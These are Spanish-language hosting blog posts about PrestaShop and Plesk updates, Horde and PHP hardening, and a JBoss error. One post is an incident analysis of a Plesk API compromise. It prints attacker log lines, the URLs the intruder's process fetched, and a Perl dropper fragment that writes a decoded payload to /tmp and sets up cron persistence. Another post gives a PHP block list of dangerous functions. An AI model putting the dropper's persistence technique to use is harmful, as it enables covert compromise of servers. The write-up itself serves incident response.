Hosting Al Descubierto

Prestashop 1.4.7.3

admin — Thu, 05 Apr 2012 16:52:28 +0000

Acaba de liberarse la nueva version de Prestashop 1.4.7.3 con las siguientes mejoras / modficiaciones:

####################################
#   v1.4.7.3 - 14469 (2012-04-05)  #
####################################

	Improved/changed features:

	[*] project : fix generation of settings file (constant _PS_CREATION_DATE_ was deleted) #PSCFI-4424

	Fixed bugs:

	[-] Installer : Fixed #PSCFI-5089

	[-] FO : BugFix : #PSCFI-4920 : escaping address field in template
	[-] FO : Fixed #PSCFI-5259 #PSCFI-3869
	[-] FO : #PSCFI-5027 : Fixed a bug, when a user which didn't have addresses can pay by check his cart
	[-] FO : #PSCFI-5115 : Fixed a problem of fancybox when cover is not first image
	[-] FO : #PSCFI-5133 : Fixed a problem linked to ssl. Used Tools::usingSecureMode() for the treatment

	[-] BO : #PI-57 : Fix bug when we import pack of language in emails files
	[-] BO : #PSCFI-5012 : Fixed a problem of label in "blockcms.php"
	[-] BO : #PSCFI-5113 : fix bug when we deleting multiple products

	[-] Classes : Fixed #PSCFI-5234 - translations in modules are now correctly handled

	[-] MO : fixed bug #PNM-20, Add locale variable replacing the defaultLang one.
	[-] MO : Fixed bug #PNM-30. Order-confirmation and others pages could be tracked.
	[-] MO : Fixed bug #PSCFI-4912. SSL can be used for redirection. (Fix other blocking bug for the module)
	[-] MO : Fixed bug #PSFV-618. Properly redirect to the order-confirmation page to see properly the validation or error of the payement.
	[-] MO : #PNM-120 : Bug fix Ogone currency conversion (was applied twice)
	[-] MO : Refactoring, fix the display of a certificate depending of the selected lang, fix rating widget and verification of the trusted box data.

	[-] LO : Bug Fixed #PSCFI-4275 - SK Unit type

La descarga de la última versión en :
http://www.prestashop.com/download/releases/prestashop_1.4.7.3.zip

Share/Bookmark

Usando Horde con safe_mode para enviar por smtp y no usar sendmail

admin — Thu, 15 Mar 2012 15:31:54 +0000

Seguramente esté muy documentado ya por ahí pero es muy recomendable dejar de usar horde bajo sendmail con el fin de securizar la máquina. Con el cambio que comentamos a continuación, evitamos tener que ejecutar comandos en la máquina local, ya que el correo lo enviamos vía smtp al servidor local o a cualquier otro servidor que configuremos.

Resumen rápido:

Deshabilitamos la mayor parte de funciones potencialmente peligrosas para el sistema.
Esto implica que fallen algunas aplicaciones, como Horde

# /etc/php5/apache2/php.ini)
disable_functions = system,passthru,readfile,escapeshellarg,proc_close,proc_open,ini_alter,dl,show_source,curl_exec

La alternativa elegante sería activar safe_mode y dejar de usar sendmail, como vemos en el fragmento de la configuración de Horde:

# fragmento de la configuracion de horde
# /etc/psa-webmail/horde/horde/conf.p
if (ini_get("safe_mode") == "1") { // Safe mode in action
$conf['mailer']['params']['host'] = '127.0.0.1';
$conf['mailer']['params']['port'] = 25;
$conf['mailer']['params']['auth'] = false;
$conf['mailer']['type'] = 'smtp';
} else {
$conf['mailer']['params']['sendmail_path'] = '/usr/sbin/sendmail';
$conf['mailer']['params']['sendmail_args'] = '-oi';
$conf['mailer']['type'] = 'sendmail';
}

En Plesk10 se han definido plantillas para los servicios de forma que aunque cambiasemos los ficheros de configuarción de apache estos cambios se terminarían machacando y volveríamos al estado por defecto.

Para ello, Plesk ha provisto un repositorio de plantillas para configurar los servicios en /usr/local/psa/admin/conf/templates/

Para reconfigurar la plantilla tenemos aqui un copy&paste muy cómodo, como siempre nos gusta:

# reemplazar safe_mode en la plantilla
sed -i 's/safe_mode off/safe_mode on/g' /usr/local/psa/admin/conf/templates/default/horde.php
# reconfigurar las plantillas
/usr/local/psa/admin/bin/httpdmng --reconfigure-server
# recargar el servicio
apache2ctl graceful

Para probarlo es necesario cerrar la sesión de Horde y volver a autenticarse.

Share/Bookmark

Vulnerabilidad CRÍTICA en la API de Plesk

admin — Mon, 05 Mar 2012 00:35:46 +0000

Hace unas semanas se notificó por parte de Parallels un fallo crítico en el su software de panel de control de hosting: Plesk. Hicimos referencia a la nota en nuestro blog http://hostingaldescubierto.com/wordpress/2012/02/10/plesk-fallo-critico-de-seguridad-sql-injection/

Reciemiente hemos tenido accesos a una máquina usando este fallo de seguridad y vamos a compartir con vosotros algunas observaciones de estos accesos:

En el sistema se observan procesos perl no habituales, con lo que procedemos a buscar el origen del mismo con lsof y el resultado es que el origen del proceso pertenece a “/tmp/…” y se se ha eliminado. Ya esto nos da una idea de que el proceso no es para nada un proceso autorizado.

Verificamos /tmp y /var/tmp donde encontramos algunos ficheros ajenos al sistema pero sin contenido.

Si nos enganchamos al proceso , podemos ver que constantemente se está descargando ficheros de diversas urls con wget:


https://eycgkhkxfs.tmdnzapomk.info:1905//b/index.php?id=...

https://94.23.208.20:1905//b/index.php?id

https://rqckfdgumv.sxobnmbjzb.info:1905//b/index.php?...

Después de consultar algunas fuentes ( gracias Logan ) vemos que en los ficheros de logs de panel de control de plesk en /usr/local/psa/admin/logs/httpsd_access_log tenemos llamadas al fichero agent.php de la api de Plesk y posteriormente accesos al panel de control donde se suben ficheros a diversos dominios.

httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:00:33:05 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"
httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:03:04:52 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"
httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:03:37:21 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"

110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:37 +0100] "POST /login_up.php3 HTTP/1.1" 200 966 "https://x.x.x.x:8443/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:42 +0100] "GET /plesk/client@3/domain@/?context=domains HTTP/1.1" 200 29327 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:50 +0100] "GET /plesk/client@3/domain@222/hosting/file-manager/?cmd=chdir&file=%2Fcgi-bin%2F HTTP/1.1" 200 39293 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:13:06 +0100] "POST /plesk/client@3/domain@222/hosting/file-manager/create-file/ HTTP/1.1" 303 0 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"

y dentro del dominio en la carpeta /cgi-bin/ vemos ficheros .cgi con el contenido de los scripts que el atacante ha subido.

Un fragmento de uno de los scripts nos indica que los procesos ejecutados en el sistema provienen de esos ficheros

open(OLD_UNIX, ">", "/tmp/.X11-unix");
print OLD_UNIX decode_base64("....L....");
close(OLD_UNIX);
system("echo '* * * * * perl /tmp/.X11-unix >/dev/null 2>&1' >
/tmp/cron.d ; crontab /tmp/cron.d ; rm /tmp/cron.d");
system("perl /tmp/.X11-unix");
print "exdone\n";

Como medidas para prevenir este fallo de seguridad hay que actualizar Plesk aplicando los microupdates.
Reviar /var/spool/cron aunque en nuestro caso no se han encontrado crontabs ajenos.
Es recomendable también ajustar los permisos para wget, curl y get

http://kb.parallels.com/en/113321

En breve daremos más detalles de las evidencias obtenidas.

Share/Bookmark

Github hacked

admin — Wed, 15 Feb 2012 10:07:31 +0000

Pues sí, la seguridad de Github ha sido comprometida hace unos días aquí teneis un enlace de Slashdot.

En este otro sitio teneis una entrada en el blog del propio github

Si teneis cuenta en github se recomienda encarecidamente que cambieis vuestras credenciales

Share/Bookmark

Plesk Fallo crítico de seguridad: SQL Injection

admin — Fri, 10 Feb 2012 08:52:11 +0000

Se ha notificado desde Parallels a todos los clientes de que existe un fallo grave de seguridad que permitie la inyección de código SQL que afecta a algunas versiones antiguas de Plesk . Las versiones afectadas son :

Linux – Plesk 10.3.1
Linux – Plesk 9.5.4
Linux – Plesk 8.6.0
Windows 10.3.1
Windows Plesk 9
Windows Plesk 8

Se han publicado parches para solucionar estos problemas. Instalando los microupdates se corrije el problema, excepto en las versiones para Windows Plesk 9 y Windows Plesk 8 que se han publicado parches específicos en este enlace :

How to fix vulnerability in Plesk 8.6, 9.3, and 9.5 for Windows

Para las versiones linux se puede ejecutar este comando para actuailzar la distribución:

/usr/local/psa/admin/sbin/autoinstaller --select-product-id plesk --select-release-current --reinstall-patch --install-component base

Y por último si queremos verificar la versión de nuestra instalación lo podemos comprobar así:

cat /usr/local/psa/version

No hace falta decir que es crítico actualizar el sistema.

Share/Bookmark

sopastrike.com – Vamos a la huelga

admin — Tue, 17 Jan 2012 22:39:46 +0000

Mañana 18 de Enero de 2012, cierro la web , junto con tantos otros miles de sitios para protestar contra las leyes SOPA y PIPA que próximamente votarán en Estados Unidos.

NO A LA CENSURA DE INTERNET

http://sopastrike.com/

Share/Bookmark

sopastrike: Hosting Al Descubierto va a la huelga

admin — Tue, 17 Jan 2012 22:36:50 +0000

La verdad que no hemos hecho campaña de ningún tipo desde HostingAlDescubierto informando acerca de la #leysinde, SOPA , PIPA que actualmente están haciendo agitar medio mundo.

Mañana día 18 de Enero de 2012 miles o millones de sitios webs cerrarán durante unas horas para protestar contra las absurdas leyes que Estados Unidos que intentar censurar la red con el criterio que imponen las grandes compañías.

Es el momento de que todos luchemos por defender lo que queremos, en estos momentos en los que los sistemas políticos, financieros y sociales se tambalean.

http://sopastrike.com/

Share/Bookmark

JBOSS: java.net.ConnectException: Connection refused

admin — Tue, 10 Jan 2012 11:07:47 +0000

Vamos a ir subiendo algunos errores tipicos de jboss que aparecen en el log

WARN  [org.jboss.resource.connectionmanager.JBossManagedConnectionPool] Throwable while attempting to get a new connection: null
org.jboss.resource.JBossResourceException: Could not create connection; - nested throwable: (com.mysql.jdbc.CommunicationsException: Communications link failure due to underlying exception: 

** BEGIN NESTED EXCEPTION ** 

java.net.SocketException
MESSAGE: java.net.ConnectException: Connection refused

STACKTRACE:

java.net.SocketException: java.net.ConnectException: Connection refused

Este es facil, directamente no puede conectar con la base de datos Mysql usando el odbc, asi que hay que comprobar que la base de datos esta levantada, usuario , password, etc…

Share/Bookmark

Parallels Plesk Panel 10.4 Publicada !

admin — Wed, 09 Nov 2011 11:54:32 +0000

A partir de la pasada noche los Partners de Parallels ya tienen a su disposición la versión 10.4 del famoso panel de control de origen ruso. Estará a disposición del público en general a partir del 22 de Noviembre.

Descargas y documentacion :

Partners can Download Plesk 10.4 Today at www.parallels.com/download/plesk10.4
Plesk 10.4 Documentation can be found at www.parallels.com/products/plesk/documentation/104

Se ofrecen varios ‘webminars’ de formación con los nuevos cambios

Webinar: Parallels Partner Training on Plesk 10.4 for C-level and marketers
Monday, November 14th – 12:00-1:00pm (Seattle, GMT -8)
Register at http://bit.ly/t68i2g
Webinar: Parallels Partner Technical Training on Plesk 10.4
Tuesday, November 15th – 08:00-09:00am (Seattle, GMT-8)
Register at http://bit.ly/uJsiHL
Webinar: Parallels Partner Sales Training
Monday, November 28th – 10:00-11:00am (Seattle, GMT -8)
Register at http://bit.ly/sCp0w8

Share/Bookmark

Parallels Plesk Panel 10.4 Marketing Preview

admin — Wed, 26 Oct 2011 07:30:49 +0000

Parallels anuncia su nueva release para el 18 de Noviembre. Seguramente ya es conocido por todos los lectores qué es Parallels Plesk Panels, para los que no, que sepais que Plesk es software de gestión de hosting que permite gestionar dominios, cuentas de correo, cuentas ftp, certificados, ssl e integrarlo con otras aplicaciones de Parallels. Aquí teneis más informacion http://www.parallels.com/products/plesk/

¿ qué tienes que hacer para probalarla ? fácil, puedes encontrarla aquí http://www.parallels.com/download/plesk10.4

Resumiendo las mejoras importantes:
* Configuración de php.ini por dominio
* Configuración de módulos de apache: activar y desactivar módulos
* Dedicar una ip de salida a un cliente para enviar correo
* Descargar ficheros de log vía ftp
* Buzones de correo no aceptan nuevos mails si han superado la quota de espacio
* Mejoras en el sistema de backup ( siempre ha sido un punto débil de Plesk menos en la versión 8 )
* Mejoras en las herramientas de migración ( otra herramienta delicada que no siempre funciona bien )

Esto es lo más destacable, pero para ver la lista completa podeis pasaros por estos enlaces :

* Parallels Plesk Panel 10.4 for Linux-based Operating Systems release notes
* Parallels Plesk Panel 10.4 for Windows-based Operating Systems release notes

Share/Bookmark